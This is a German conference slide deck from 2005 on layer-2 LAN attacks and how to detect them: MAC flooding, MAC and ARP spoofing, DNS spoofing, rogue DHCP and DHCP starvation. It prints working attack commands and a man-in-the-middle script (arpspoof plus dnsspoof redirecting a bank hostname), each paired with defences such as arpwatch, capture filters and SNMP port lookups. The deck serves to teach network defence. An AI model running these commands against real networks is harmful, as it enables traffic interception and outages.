Hacking the Ethernet - decus.de · Hacking the Ethernet 2B03 Andreas Aurand Network Consultant...

IT-Symposium 2005

1www.decus.de

05. April 2005

© 2004 Hewlett-Packard Development Company, L.P.The information contained herein is subject to change without notice

Hacking the Ethernet

2B03

Andreas AurandNetwork Consultant NWCC, HP

March 31, 2005 Andreas Aurand, HP Network Competence Center 2

Agenda• Übersicht

• Sniffing

• MAC-Angriffe

• ARP Spoofing

• DNS Spoofing

• DHCP-Angriffe

• Andere LAN-Angriffe

IT-Symposium 2005

2www.decus.de

05. April 2005


Shared Ethernet• Bus-Topologie. Alle Maschinen sind an einem

gemeinsam genutzten Bus angeschlossen.• Die einzelnen physikalischen Kabel sind über Hubs

verbunden, • Leiten jedes empfangene Paket an alle verfügbaren Ports weiter• Jedes System kann den gesamten Datenverkehr sehen

• Shared Ethernet bietet keine Sicherheit

Zielsystem00-00-F8-31-A4-2D

SenderAngreifer

Ethernetschnittstelle filtert Pakete, die nicht für sie bestimmt sind.

Befindet sich die Schnittstelle im Promiscuous Mode, werden alle Pakete vom Controller weitergegeben.

Paket zum Zielsystem 08-00-2B-01-02-03

Ethernetschnittstelle filtert Pakete, die nicht für sie bestimmt sind.


Switched Ethernet• Systeme sind direkt am Switch angeschlossen. Leitet Pakete nur an Ports

weiter, an denen MAC-Adresse des Zielsystems eingetragen ist. • Diese Information ist in MAC-Adresstabelle gespeichert• Tabelle kann auf verschiedenen Switchtypen unterschiedliche Größe haben

• Falls MAC-Adresse unbekannt ist, muss Switch die entsprechenden Paketeüber alle Ports fluten. • Unicast Flooding: Fluten der Pakete im gesamten Layer-2-Netzwerk• Switch verhält sich wie ein Hub• Pakete sind für Angreifer sichtbar


Sender08-00-2B-05-67-87

Zieladresse ist nicht in der MAC-Adresstabelle eingetragen. Switch flutet das Paket über alle Ports.

Paket zum Zielsystem 00-00-F8-31-A4-2D

Zieladresse ist nicht in der MAC-Adresstabelle eingetragen. Switch flutet das Paket über alle Ports.

Port 2/17

Port Fa0/24

IT-Symposium 2005

3www.decus.de

05. April 2005


Sniffing


Sniffing• Angreifer versucht, in Besitz von sensitiven Daten zu gelangen

• Passwörter, vertrauliche Daten usw.• Schnittstelle ist im Promiscuous Mode

Default GatewayIP: 10.185.208.190 / 21

MAC: 00-00-0C-07-AC-7B

Angreifer (Host attack)

IP: 10.185.208.189 / 21MAC: 00-60-97-80-9D-D6

IT-Symposium 2005

4www.decus.de

05. April 2005


Promiscuous Mode Scanner• Erkennen Schnittstellen, die im Promiscuous Mode laufen

• z.B. proDETECT, Promiscan, anti_sniff oder Cain


Cain - MAC Scanner• Host 192.168.28.198 nicht im Promiscuous Mode

• http://www.blackhat.com/html/bh-usa-01/bh-usa-01-speakers.html#Daiji%20Sanai

IT-Symposium 2005

5www.decus.de

05. April 2005


Cain - MAC Scanner• Host 192.168.28.198 im Promiscuous Mode


MAC-Angriffe

IT-Symposium 2005

6www.decus.de

05. April 2005


Switched Ethernet• Aufbau der MAC-Adresstabelle

• MAC-Adresse ist in der Tabelle vorhanden

Sender00-00-F8-31-A4-2D

Zielsystem08-00-2B-05-67-87

Switch trägt die neue MAC-Adresse mit dem zugehörigen Port in seine Tabelle ein.

Port 2/17

Port Fa0/24

Switch trägt die neue MAC-Adresse mit dem zugehörigen Port in seine Tabelle ein.


Sender08-00-2B-05-67-87

Paket zum Zielsystem 00-00-F8-31-A4-2D

Port 2/17

Port Fa0/24

Switch filtert Paket.

Switch filtert Paket.

# show mac-address-table address 0000.F831.A42DNon-static Address Table:Destination Address Address Type VLAN Destination Port------------------- ------------ ---- ----------------0000.f831.a42d Dynamic 1 FastEthernet0/24


MAC Flooding• Angreifer versucht die MAC-Adresstabelle aufzufüllen

• Tools: macof oder pktgen

Angreifer"attack"

Pakete mit unterschiedlichen MAC-QuelladressenPakete mit unterschiedlichen MAC-Quelladressen

2/17

Rechner C

Rechner ACat2924CCat5000

Paket für Rechner CPaket für Rechner C Paket für R

echner CP

aket für Rechner C

Paket für R

echner CP

aket für Rechner C

Rechner B

Paket für Rechner CPaket für Rechner C2/18

Fa0/241/2

linny:~ # macof -i eth1 -n 150000macof: c:55:87:40:a3:81 -> 6a:b2:2a:33:a4:d6macof: 2e:4d:22:56:a2:e5 -> 31:cc:e:1e:5b:6macof: 3d:20:31:22:f6:c6 -> 43:a2:31:46:e0:c3

cat5000> (enable) show cam count dynTotal Matching CAM Entries = 130904

IT-Symposium 2005

7www.decus.de

05. April 2005


MAC Flooding• Überlauf der Forwarding-Tabelle über SNMP auslesen

• .iso.org.dod.internet.mgmt.mib-2.dot1dBridge.dot1dTp.dot1dTpLearnedEntryDiscards

# macof -i eth1 -n 100000 >/dev/null 2>&1 &# snmpget -c public 10.185.208.1 mib-2.17.4.1.0 (mib-2 = 1.3.6.1.2.1)SNMPv2-SMI::mib-2.17.4.1.0 = Counter32: 4427


MAC Spoofing• Angreifer verwendet MAC-Adresse eines bekannten Systems

• Angreifer kann Pakete nicht an das Zielsystem weiterleiten• DoS-Angriff oder Rogue Server

attack# macchanger --mac=00:10:7b:36:4e:80 eth0Current MAC: 00:60:97:80:9d:d6 (3com Corporation)Faked MAC: 00:10:7b:36:4e:80 (Cisco Systems, Inc.)

Default GatewayIP: 192.168.28.10

MAC: 00:10:7b:36:4e:80

Angreifer IP: 192.168.28.196

MAC: 00:60:97:80:9d:d6

Pakete mit Quelladresse: 00:60:97:80:9d:d6Pakete mit Quelladresse: 00:60:97:80:9d:d6

3/13

3/15

HTTP ServerIP: 10.185.208.185

MAC: 00-00-F8-71-2E-B3

3/13

3/15

http://10.185.208.185/http://10.185.208.185/

Angreifer IP: 10.185.208.189

MAC: 00:04:c1:7d:d6:54

Pakete mit Quelladresse: 00-00-F8-71-2E-B3Pakete mit Quelladresse: 00-00-F8-71-2E-B3

IT-Symposium 2005

8www.decus.de

05. April 2005


MAC Spoofing• Forwarding-Tabelle nach MAC-Adresse durchsuchen

• MAC-Adresse in Dezimalwert umwandeln• 00:10:7b:36:4e:80 = 0.16.123.54.78.128

• SNMP dot1TpFdbPort-Variable abfragen• # snmpget 192.168.28.1 mib-2.17.4.3.1.2.0.16.123.54.78.128• SNMPv2-SMI::mib-2.17.4.3.1.2.0.16.123.54.78.128 = INTEGER: 67

• ifIndex für Spanning-Tree-Portnummer suchen• # snmpget 192.168.28.1 mib-2.17.1.4.1.2.67• SNMPv2-SMI::mib-2.17.1.4.1.2.67 = INTEGER: 13

• ifName für ifIndex suchen• snmpget 192.168.28.1 mib-2.31.1.1.1.1.13• IF-MIB::ifName.12 = STRING: 2/3

Spanning-Tree Portnummer

ifIndex-Nummer

Portbezeichnung auf dem Switch


Switchport zu MAC-Adresse zuordnen

• cammer (perl-Skript, Teil von MRTG)• http://people.ee.ethz.ch/~oetiker/webtools/mrtg/pub/contrib/cammer

# ./cammer.pl [email protected] [email protected]* Gather VLAN index Table from Switch ARRAY(0x815acdc)* Gather Interface Name Table from Switch ARRAY(0x8171a9c)* Gather Arp Table from Router ARRAY(0x8171b38)* Gather Mac 2 Port and Port 2 Interface table for all VLANS1/1 1 00:90:f2:40:bb:172/10 1 00:10:7b:36:4e:802/11 1 00:60:5c:f4:72:6f 192.168.28.254 nixat2.frs-lab.de2/12 1 aa:00:04:00:6f:fc 192.168.28.30 c2610-30.frs-lab.de2/12 82 aa:00:04:00:6f:fc 192.168.28.30 c2610-30.frs-lab.de2/12 111 aa:00:04:00:6f:fc 192.168.28.30 c2610-30.frs-lab.de2/18 1 00:0e:7f:5c:f6:80 192.168.28.52 p2650.frs-lab.de2/18 1 00:0a:57:05:f5:00 192.168.28.51 p5308xl-2.frs-lab.de2/18 111 00:0e:7f:5c:f6:f82/24 1 00:50:54:14:ab:fb2/24 1 00:01:63:55:9b:072/24 1 00:00:f8:71:2a:74 192.168.28.200 cpsp.frs-lab.de2/24 1 00:01:e7:96:a9:00 192.168.28.50 p5308xl-1.frs-lab.de2/24 1 00:50:54:14:ab:ff 192.168.28.2 cat5000-sup2.frs-lab.de2/24 1 00:00:00:00:fe:002/24 1 00:10:7b:3b:5c:a1 192.168.28.20 c2501.frs-lab.de2/24 5 00:01:63:55:9b:072/24 81 00:01:63:55:9b:072/24 99 00:01:63:55:9b:072/24 111 00:01:63:55:9b:072/9 1 00:10:7b:7f:b6:c1 192.168.28.13 c2503-13.frs-lab.de

IT-Symposium 2005

9www.decus.de

05. April 2005


Netdisco• Zuordnung einer MAC-Adresse zu einem Switchport


Netdisco• Device-Informationen

IT-Symposium 2005

10www.decus.de

05. April 2005


Netdisco• Netzwerk-Topologie


ARP-Guard• Meldet automatisch MAC-Spoofing-Angriff

IT-Symposium 2005

11www.decus.de

05. April 2005


ARP-Guard• Informationen über den Angriff


ARP-Guard• Lokalisierung des Angriffs

IT-Symposium 2005

12www.decus.de

05. April 2005


ARP-Guard• Übersicht über die verschiedenen Switchports


ARP Spoofing

IT-Symposium 2005

13www.decus.de

05. April 2005


Wie funktioniert der ARP Cache ?

Ja

Nein

Ja

Nein

Protokolltypunterstützt ?Protokolltypunterstützt ?

Merge_Flag := FalseMerge_Flag := False

Eintrag fürSenderpaar imARP Cache ?

Eintrag fürSenderpaar imARP Cache ?

Neuen Eintrag im ARP Cache anlegenNeuen Eintrag im

ARP Cache anlegen

IP-Adresse desZielsystems =lokale Adresse

IP-Adresse desZielsystems =lokale Adresse

Eintrag im ARP Cacheerneuern

und Merge_Flag := True

Eintrag im ARP Cacheerneuern

und Merge_Flag := True

Ja

Ja

Nein

Nein

1

2

Operation-Feld aufares_op$REPLY setzen

Operation-Feld aufares_op$REPLY setzen

Handelt es sich um einen

Request ?

Handelt es sich um einen

Request ?

Lokale HW- und Protokolladresse in die Senderfelder eintragen

Lokale HW- und Protokolladresse in die Senderfelder eintragen

Ja

Reply-Paket als Unicast an HW-Adresse des Zielsystems senden

Reply-Paket als Unicast an HW-Adresse des Zielsystems senden

Nein

Merge Flag = False ?

Merge Flag = False ?

Der ARP Reply wird immer als Unicast an die MAC-Adresse gesendet, die im Request-Paket als „Sender MAC Address“eingetragen ist.


ARP Spoofing• Bestehende Einträge im ARP Cache durch „gefälschte“ ARP-

Pakete modifizieren und neue Einträge hinzufügen

• ARP Spoofing oder ARP Cache Poisoning

• Ermöglicht DoS- und MitM-Attacken

• Gratuitous ARP• ARP Reply Broadcast um einen bestehenden Eintrag auf

allen Systemen des LANs abzuändern• Häufig benutzt, um ARP-Eintrag des Default Gateway

auf allen Hosts eines Subnetzes zu modifizieren

IT-Symposium 2005

14www.decus.de

05. April 2005


arpspoof

attack# arpspoof -i eth0 192.168.28.254Ethernet II, Src: 00:60:97:80:9d:d6, Dst: ff:ff:ff:ff:ff:ffAddress Resolution Protocol (reply)

… … …Opcode: reply (0x0002)Sender MAC address: 00:60:5c:f4:72:6fSender IP address: 192.168.28.254Target MAC address: ff:ff:ff:ff:ff:ff (Broadcast)Target IP address: 0.0.0.0 (0.0.0.0)

attack# arpspoof -i eth0 -t 192.168.28.197 192.168.28.254Ethernet II, Src: 00:60:97:80:9d:d6, Dst: 00:00:f8:71:2e:b3Address Resolution Protocol (reply)

… … …Opcode: reply (0x0002)Sender MAC address: 00:60:97:80:9d:d6Sender IP address: 192.168.28.254)Target MAC address: 00:00:f8:71:2e:b3 Target IP address: 192.168.28.197

# arp -a 192.168.28.254192.168.28.254 at 00:60:97:80:9D:D6

AngegriffeneRechner

Default GatewayIP: 192.168.28.254

MAC: 00-60-5c-f4-72-6f


IP: 192.168.28.196MAC: 00-60-97-80-9D-D6

Angriff über ARP Request oder ReplyAngriff über ARP Request oder Reply

Gratuitous ARP wird als Broadcast gesendet.


arpwatch• ARPwatch erkennt Änderungen in der Zuordnung

zwischen IP- und MAC-Adresse# arpwatch -dN -i eth1 -f /usr/local/var/log/arp.datFrom: arpwatch (Arpwatch)To: rootSubject: changed ethernet address (router.frs-lab.de)

hostname: router.frs-lab.deip address: 192.168.28.254

ethernet address: 0:60:97:80:9d:d6ethernet vendor: 3COM CORPORATION

old ethernet address: 0:60:5c:f4:72:6fold ethernet vendor: CISCO SYSTEMS, INC.

timestamp: Sunday, February 6, 2005 13:16:55 +0100previous timestamp: Sunday, February 6, 2005 13:15:43 +0100

delta: 1 minute

Nach dieser Adresse in der Forwarding-Tabelle suchen.

IT-Symposium 2005

15www.decus.de

05. April 2005


arpwatch# cat /usr/local/var/log/arp.dat0:60:5c:f4:72:6f 192.168.28.254 1107692483 router0:60:97:80:9d:d6 192.168.28.254 1107692480 router0:0:f8:71:2a:74 192.168.28.200 1107692443 cpsp0:0:f8:71:2e:b3 192.168.28.197 1107692449 unix0:60:97:80:9d:d6 192.168.28.196 1107692449 linny0:0:f8:70:7c:86 192.168.28.199 1107692115 pc


tethereal• Statistik für ARP-Pakete mit tethereal erzeugen

• Anzeige der MAC-Adressen bei Summary-Ausgabe

• Script für periodische Statistik

# more ~/.ethereal/preferences... … ...column.format: "Time", "%Yt","MAC Source", "%uhs",

"MAC Destination", "%uhd","Source", "%s", "Destination","%d", "Protocol", "%p", "Info", "%i"

# cat arpstat#!/bin/bashwhile true;

dotethereal -a duration:60 -qz conv,eth -i eth1 arp;date;

done;

IT-Symposium 2005

16www.decus.de

05. April 2005


# arpstatCapturing on eth144 packets captured================================================================================

| <- | | -> | | Total || Frames Bytes | | Frames Bytes | | Frames Bytes |

00:60:97:80:9d:d6 <-> ff:ff:ff:ff:ff:ff 0 0 30 1800 30 180000:00:f8:71:2a:74 <-> 00:00:f8:71:2e:b3 2 120 2 120 4 24000:00:f8:71:2e:b3 <-> 00:60:97:80:9d:d6 2 120 2 120 4 240================================================================================Fri Feb 4 15:28:19 MET 2005--------------------------------------------------------------------------------Capturing on eth149 packets captured================================================================================


00:60:97:80:9d:d6 <-> ff:ff:ff:ff:ff:ff 0 0 32 1920 32 192000:00:f8:71:2a:74 <-> 00:90:f2:40:bb:00 1 64 1 60 2 12400:00:f8:71:2a:74 <-> ff:ff:ff:ff:ff:ff 0 0 1 60 1 60================================================================================Fri Feb 4 15:29:22 MET 2005--------------------------------------------------------------------------------

tethereal• Erkennen von Gratuitous ARP


• Erkennen von "normalem" ARP Spoofing

• Anschließend kann man Switchport für die MAC-Adresse 00:60:97:80:9d:d6 über Bridge MIB bestimmen.

# arpstatCapturing on eth142 packets captured================================================================================


00:60:97:80:9d:d6 <-> 00:00:f8:71:2e:b3 0 0 31 1860 31 186000:00:f8:71:2e:b3 <-> 00:60:97:80:9d:d6 2 120 2 120 4 24000:00:f8:71:2a:74 <-> 00:60:5c:f4:72:6f 1 60 1 60 2 12000:00:f8:71:2a:74 <-> 00:10:7b:7f:b6:60 0 0 2 120 2 12000:10:7b:7f:b6:60 <-> ff:ff:ff:ff:ff:ff 0 0 2 120 2 12000:00:f8:71:2a:74 <-> ff:ff:ff:ff:ff:ff 0 0 1 60 1 60================================================================================Fri Feb 4 15:33:33 MET 2005--------------------------------------------------------------------------------

tethereal

IT-Symposium 2005

17www.decus.de

05. April 2005


ARP-Guard• Meldet automatisch ARP-Spoofing-Angriff


ARP-Guard• Informationen über den Angriff

IT-Symposium 2005

18www.decus.de

05. April 2005


ARP-Guard• Lokalisierung des Angriffs


DNS Spoofing

IT-Symposium 2005

19www.decus.de

05. April 2005


DNS Spoofing• Oft für Man-in-the-Middle-Attacken benutzt

• Verschlüsselte Verbindungen terminieren angreifendem Rechner• SSH• HTTPS

• Angreifer beantwortet DNS Query mit eigenem DNS Response• Reply-Adresse ist seine eigene IP-Adresse

• Angreifer muss DNS Queries empfangen können• ARP Spoofing

• MAC Flooding


DNS SpoofingServer

(Host www.bank.de)10.185.208.186

Angegriffener RechnerIP: 10.205.210.127 / 21

MAC: AA-00-04-00-37-FD


IP: 10.205.208.189 / 21MAC: 00-60-97-80-9D-D6 DNS Response (Host: www.bank.de, IP: 10.185.208.186)DNS Response (Host: www.bank.de, IP: 10.185.208.186)

DNS Queries gehen immer zuerst zum Angreifer.

Session zwischen dem Angreifer und dem eigentlichen Server

DNS Query (Host: www.bank.de)DNS Query (Host: www.bank.de)

Die DNS Response des Angreifers enthält seine IP-Adresse.


MAC: 00-00-F8-71-2E-B3

DNS Server 10.34.93.242

IT-Symposium 2005

20www.decus.de

05. April 2005


SSHv1 MitM-Attacke Fingerabdruck des öffentlichen Server Keys

38:23:ef:ab:34:13:43:ce:16:3d:c0:c5:dc:d4:93:5b [email protected] des öffentlichen Server Keys

38:23:ef:ab:34:13:43:ce:16:3d:c0:c5:dc:d4:93:5b [email protected]

Angegriffener Rechner(Host pcdepp)

IP: 10.205.210.127


IP: 10.205.208.189

SSH Server (Host www.bank.de)

10.185.208.186

SSH Session zwischen dem Client und dem Angreifer.

SSH Session zwischen dem Angreifer und dem eigentlichen Server.

DNS Server 10.34.93.242



dnsspoof (dsniff-Tool)• Script für DNS Spoofing

attack# cat mitm## Enable Forwarding and disable sending ICMP Redirects#echo "1" > /proc/sys/net/ipv4/ip_forwardecho "0" > /proc/sys/net/ipv4/conf/eth0/send_redirects## Enable ARP and DNS Spoofing#arpspoof -i eth0 10.205.208.1 2>/dev/null &dnsspoof -i eth0 -f dnsspoof.hosts host 10.205.210.127 2>/dev/null &

# cat dnsspoof.hosts10.205.208.189 www.bank.de

IP-Adresse des Default Gateway

IP-Adresse des angegriffenen Rechners

IP-Adresse, die vom Angreifer als Reply auf einen DNS Request für www.bank.de zurückgesendet wird.

IT-Symposium 2005

21www.decus.de

05. April 2005


tethereal• Erkennen von DNS Spoofing durch tethereal

• Anschließend kann man Switchport für die MAC-Adresse 00:60:97:80:9d:d6 über Bridge MIB bestimmen.

# tethereal -lni eth1 not ether src 00:00:f8:71:2e:b3 and udp src port 53Capturing on eth12005-02-04 11:02:18.762435 00:60:97:80:9d:d6 -> aa:00:04:00:37:fd 10.34.93.242 -> 10.205.210.127DNS Standard query response A 10.205.208.189

2005-02-04 11:02:18.762803 00:60:97:80:9d:d6 -> aa:00:04:00:37:fd 10.34.93.242 -> 10.205.210.127DNS Standard query response A 10.205.208.189


DHCP-Angriffe

IT-Symposium 2005

22www.decus.de

05. April 2005


DHCP Rogue Server• Angreifer setzt eigenen DHCP-Server ab um Clients mit

falschen Informationen zu versorgen. • Ermöglicht DoS- als auch MitM-Attacken• Falls DHCP Client die IP-Adresse vorgibt, funktioniert Angriff nicht

Default Gateway192.168.1.1 Angegriffener

DHCP Client

NormalerDHCP Server 192.168.1.2

DHCP Offer mit 192.168.1.185 als Default Gateway

DHCP Offer mit 192.168.1.185 als Default Gateway

Alle vom Client gesendeten Pakete gehen über den Angreifer.

Rückverkehr geht vom Default Gateway direkt zum Client.

AngreifenderRogue Server 192.168.1.185


attack# ./Gobbler -m 1 -D 192.168.1.185 -G 192.168.1.185 -A 192.168.1.33DHCP gobbler v0.66 from www.networkpenetration.com--------------------------------------------------Man the middle attackTrying to gobble address to be used in man in the middle attackDHCP Discover packet constructed and injected, wrote all 342 bytesSniffing DHCP packets.....Got a DHCP OFFER packetDHCP request packet constructed and injected, wrote all 342 bytesSniffing DHCP packets.....Got a DHCP ACK packet192.168.1.113 gobbled.... Total: 1Address(es) to be spoofed 192.168.1.113Sniffing for discover messagesSniffing DHCP packets.....Got A DHCP discover packet..... a host is trying to find a valid IPTime to do the dirty workDHCP Offer packet constructed and injected, wrote all 342 bytesSniffing DHCP packets.....got a dhcp request packetTransaction compare passed...Request IP: 192.168.1.113Offerd IP: 192.168.1.113Sent + Requested IP's match.... sending ackCreating an Ack packetDHCP ACK packet constructed and injected, wrote all 342 bytesMan in the middle should be established m00 m4m4m4m4Just checking incase of other servers weren't happy (waiting for 10 seconds)

Sniffing DHCP packets.....

DHCP Gobbler

Rogue Server allokiert eine Adresse vom richtigen DHCP-Server.

Wenn Client ein DHCP Discover sendet, schickt Rogue Server ein DHCP Offer mit der gestohlenen IP-Adresse sowie den Informationen über das neue Default Gateway und den neuen DNS-Server an Client zurück.

IP-Adressen für Gateway (G), DNS-Server (D) und DHCP-Server (A)

IT-Symposium 2005

23www.decus.de

05. April 2005


tethereal• tethereal protokolliert DHCP Replies, die andere MAC-

Adresse als der eigentliche DHCP-Server verwenden.

• Anschließend kann man Switchport für die MAC-Adresse 00:10:7b:7f:b6:c1 über Bridge MIB bestimmen.

# tethereal -Nmnt -li eth1 not ether src aa:00:04:00:6f:fc and udp dst port 68Capturing on eth12005-02-04 14:12:17.264303 00:10:7b:7f:b6:c1 -> ff:ff:ff:ff:ff:ff 192.168.1.33 -> 255.255.255.255 DHCP DHCP Offer - Transaction ID 0x133b

MAC-Adresse des "richtigen" DHCP-Servers.


DHCP Starvation• Angreifer “spooft” den DHCP Packet Exchange

• Fordert alle verfügbaren IP-Adressen vom Servers an

• Server kann Clients keine Adresse mehr zuweisen• DoS-Attacke auf den DHCP-Server.

attack# DHCPGobbler -gDetecting DHCP service for gobble attackDHCP server at 1A92.168.1.190 offering 192.168.1.101 with subnet mask 255.255.255.0 gateway 192.168.1.1 and DNS 10.185.208.34192.168.1.101 gobbled using MAC 0:28:c:a8:5e:a7192.168.1.102 gobbled using MAC 0:a8:25:24:5e:51192.168.1.103 gobbled using MAC 0:48:c4:b3:a9:a0192.168.1.104 gobbled using MAC 0:3c:63:ab:41:f3192.168.1.105 gobbled using MAC 0:73:92:a7:75:1b….

DHCP-Server192.168.1.190

Angreifer

Da DHCP-Server seine ganzen Adressen vergeben hat, kann er DHCP Requests der Clients nicht mehr beantworten.

DHCP RequestDHCP Request

Vorgetäuschter DHCP-PaketaustauschVorgetäuschter DHCP-Paketaustausch DHCP Clients

Für jede Anforderung muss eine neue MAC-Adresse verwendet werden

IT-Symposium 2005

24www.decus.de

05. April 2005


tethereal• tethereal protokolliert alle DHCP Requests

# ethereal -a duration:300 -i tu0 -qz conv,ether udp dst port 67================================================================================Ethernet ConversationsFilter:<No Filter>


08:00:2b:2b:98:32 <-> ff:ff:ff:ff:ff:ff 0 0 10 3780 10 378008:00:2b:93:2f:8a <-> ff:ff:ff:ff:ff:ff 0 0 10 3780 10 378008:00:2b:a2:7d:08 <-> ff:ff:ff:ff:ff:ff 0 0 5 1890 5 1890================================================================================


Andere LAN-Attacken

IT-Symposium 2005

25www.decus.de

05. April 2005


Andere LAN-Attacken

• Spanning-Tree-Attacken• Schutz durch richtige Konfiguration der Switches

• Festlegen an welchen Ports andere Switches angeschlossen werden dürfen

• Festlegen über welche Ports die Root Bridge gesehen werden darf

• VLAN-Attacken• Schutz durch richtige Konfiguration der Switches

• Eigenes VLAN für Trunk-Verbindungen

• VLAN 1 nicht verwenden


file2cable• sendet Binärdatei als Ethernet Frame

# tethereal -x -ni eth0 ether dst 01:80:c2:00:00:00Capturing on eth00.000000 00:01:63:55:9a:f1 -> 01:80:c2:00:00:00 STP Conf. Root = 0/00:0e:7f:5c:f6:80 Cost = 3019 Port = 0x8042

0000 01 80 c2 00 00 00 00 01 63 55 9a f1 00 26 42 42 ........cU...&BB0010 03 00 00 00 00 00 00 00 00 0e 7f 5c f6 80 00 00 ...........\....0020 0b cb 20 00 00 50 54 14 a8 00 80 42 02 00 14 00 .. ..PT....B....0030 02 00 0f 00 00 00 00 00 00 00 00 00 ............

# xxd -r stp.txt stp.bin# file2cable -v -i eth0 -f stp.binfile2cable - by FX <[email protected]>

Thanx got to Lamont Granquist & fyodor for their hexdump()stp.bin - 60 bytes raw data

0180 c200 0000 0001 6355 9af1 0026 4242 ........cU...&BB0300 0000 0000 0000 000e 7f5c f680 0000 ...........\....0bcb 2000 0050 5414 a800 8042 0200 1400 .. ..PT....B....0200 0f00 0000 0000 0000 0000 ............

Packet length: 60

Der mit tethereal erzeugte HEX Outputwird in die Datei stp.txt kopiert.

xxd: Umwandlung der Text- in eine Binärdatei.

IT-Symposium 2005

26www.decus.de

05. April 2005


Netdisco• Anzeige der Ports, die auf Blocking stehen


LAN-Sicherheit• http://www.dpunkt.de/buch/3-89864-297-6.html

IT-Symposium 2005

27www.decus.de

05. April 2005


Tools• DSNIFF Tools (macof, arpspoof, dnsspoof, sshmitm …)

• http://monkey.org/~dugsong/dsniff/

• Cain• http://www.oxid.it

• Ethereal (tethereal)• http://www.ethereal.com

• Netdisco• http://www.netdisco.org


Tools• macchanger

• http://www.alobbs.com/

• arpwatch• http://http://www-nrg.ee.lbl.gov/

• DHCP Gobbler• http://www.networkpenetration.com/

• file2cable• http://www.phenoelit.de/fr/tools.html

IT-Symposium 2005

28www.decus.de

05. April 2005


Tools• MRTG (Multi Router Traffic Grapher)

• http://www.mrtg.org• http://people.ee.ethz.ch/~oetiker/webtools/mrtg/pub/

contrib/cammer

• ARP-Guard (kommerziell)• http://www.arp-guard.com/

ARP SpoofingMAC SpoofingMAC FloodingZuordnung zwischen Switchport und MAC-Adresse


Fragen

??

?

??

?

?

?

Hacking the Ethernet - decus.de · Hacking the Ethernet 2B03 Andreas Aurand Network Consultant...

Documents

Transcript of Hacking the Ethernet - decus.de · Hacking the Ethernet 2B03 Andreas Aurand Network Consultant...